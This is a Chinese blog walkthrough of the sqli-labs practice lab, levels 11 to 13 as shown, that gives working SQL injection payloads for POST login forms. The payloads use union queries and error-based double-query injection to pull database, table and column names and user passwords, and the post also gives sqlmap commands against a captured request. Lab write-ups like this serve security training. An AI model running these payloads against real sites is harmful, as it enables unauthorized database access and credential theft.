sqli-labs 11-20

最新推荐文章于 2025-04-07 13:20:53 发布

烜奕

最新推荐文章于 2025-04-07 13:20:53 发布

阅读量369

点赞数

分类专栏： injection 文章标签： mysql 数据库 database

本文链接：https://blog.youkuaiyun.com/asdf_yuanfang/article/details/121886331

版权

本文详细介绍了sqli-labs的11到20关的SQL注入攻击，包括手工注入和使用sqlmap的方法。涉及单引号闭合、双查询注入、布尔型盲注等多种注入技巧，解析了如何通过注入获取数据库名、表名、列名及内容。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Less-11

手工注入

1.开始为post类型的注入，先加个单引号，报错如下。

构造出SQL语句应该为：select username,password from users where username=' ' ' and password=' 2' limit 0,1; 也即是password字段被单引号包含了' and password='，导致出现2' limit 0,1;引号不匹配的情况。下图看起来更直观些。

2.所以，可构造如下语句：' # 。 #把后面的都注释掉，然后在其前面加上自己构造的语句。
3.先用group by 看看有多少列：' group by 1，经过测试，共2个字段。

4.下面，开始使用联合查询：-1' union select 1,2 #返回正常，开始构造语句。

5.查数据库名：' union select 1,database() #

6.接下来查表名，构造和Less-1类似：' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #

7.查列名' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

8.查内容：' union select group_concat(username),group_concat(password) from security.users #

OK，已经得到想要的。

用sqlmap注入

1.首先，使用BurpSuite抓包，然后保存抓取到的内容。例如：保存为use.txt，把它放至某个目录下，这里为：F:/temp/use.txt。

2.首先，判断是否存在SQL注入漏洞，python2 sqlmap.py -r F:/temp/use.txt - --batch 得到两个注入点，如图：

3.查询当前数据库python2 sqlmap.py -r F:/temp/use.txt - --batch --current-db

4.查询表:：python2 sqlmap.py -r F:/temp/use.txt - --batch -D security --tables

5.剩下的查询和Less-1的用法一样，列-内容，一个一个爆即可。

Less-12

1.加单引号，正常，加双引号，报错：

由图可知，为双引号加括号闭合。
2.构造：") #返回正常，所以用Less-11构造的方法构造语句即可。即") 构造的语句 # 不在赘述。

Less-13

1.加单引号，报错，知道为单引号加括号闭合。

2.以为就这样了，结果采用上面的构造方法无用，看来没那么简单，应该使用双查询注入了，和Less-5的构造基本相同。
3.查数据库，构造如下。') or (select 1 from (select count(*),concat((select concat(schema_name,';') from information_schema.schemata limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#

继续爆其他数据库名，改变limit n,1即可。
4.查表：') or (select 1 from (select count(*),concat((select concat(table_name,';') from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#

同样，改变limit n,1即可。
5.查列名：') or (select 1 from (select count(*),concat((select concat(column_name,';') from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) #

同样，改变limit n,1即可。
6.查内容：') or (select 1 from (select count(*),concat((select concat(username,': ',password,';') from security.users limit 0,1),floor(rand()*2)) as x from security.users group by x) as a)#